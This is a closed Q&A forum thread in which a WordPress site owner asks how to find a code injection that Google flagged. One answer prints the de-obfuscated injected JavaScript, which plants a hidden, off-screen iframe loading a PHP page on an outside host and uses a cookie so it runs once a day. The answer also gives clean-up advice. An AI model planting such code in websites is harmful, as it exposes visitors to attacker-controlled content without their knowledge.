How to find malicous code/malware on a website [closed]

Question

My Wordpress website recently became infected with malware and has been blacklisted. I thought I fixed it by updating the site and plugins and removing any code I didn't recognize.

I then used Sucuri Site Checker and it seemed okay, so I submitted a review request with Google. However, Google have said that it still contains malware in the form of malicous code (they referred to it as a code injection).

I am a bit lost for what to do. Is there a way to find the bit of code which Google is finding? The domain is sudorf.co.uk but it has malware so I wouldn't advise going there - no idea what the malware will be doing.

Any help would be greatly appreciated.

EDIT: I found that code a few days ago and deleted it, then I updated all versions etc. But obviously it has come back again. Does anyone have an idea how it might be getting there. My thoughts are that its either from a plugin - which is why I am going to remove all of them. The other is the contact form - but I didn't think this would have allowed them to edit the header.php.

Answer 1

This is pure info. Your malware looks like this when it's de-obfuscated:

 function k09() {
     var static = 'ajax';
     var controller = 'index.php';
     var k = document.createElement('iframe');

     k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php';
     k.style.position = 'absolute';
     k.style.color = '512';
     k.style.height = '512px';
     k.style.width = '512px';
     k.style.left = '1000512';
     k.style.top = '1000512';

     if (!document.getElementById('k')) {
         document.write('<p id=\'k\' class=\'k09\' ></p>');
         document.getElementById('k').appendChild(k);
     }
 }

 function SetCookie(cookieName, cookieValue, nDays, path) {
     var today = new Date();
     var expire = new Date();
     if (nDays == null || nDays == 0) nDays = 1;
     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
 }

 function GetCookie(name) {
     var start = document.cookie.indexOf(name + "=");
     var len = start + name.length + 1;
     if ((!start) &&
         (name != document.cookie.substring(0, name.length))) {
         return null;
     }
     if (start == -1) return null;
     var end = document.cookie.indexOf(";", len);
     if (end == -1) end = document.cookie.length;
     return unescape(document.cookie.substring(len, end));
 }
 if (navigator.cookieEnabled) {
     if (GetCookie('visited_uq') == 55) {} else {
         SetCookie('visited_uq', '55', '1', '/');

         k09();
     }
 }

http://dostojewskij-gesellschaft.de/VD49Jdzr.php simply outputs "OK".

Why?

My guess is that this is an IP/traffic logger. Maybe for the hackers to check which blogs are most active and then later come back and hack that particular site (no need to waste time on a site with 2 visitors a month). This is good and bad.

The good part is that it seems that they haven't used any of your user database or anything else.

The bad part is that they might very well have downloaded your entire database since they've obviously had executing rights on your server, and might've placed their PHP files all over your server. Your best bet is to start on a fresh WP and copy plugins/themes in one-by-one while manually checking them.

Change all passwords. Even your DB login. Consider everything compromised.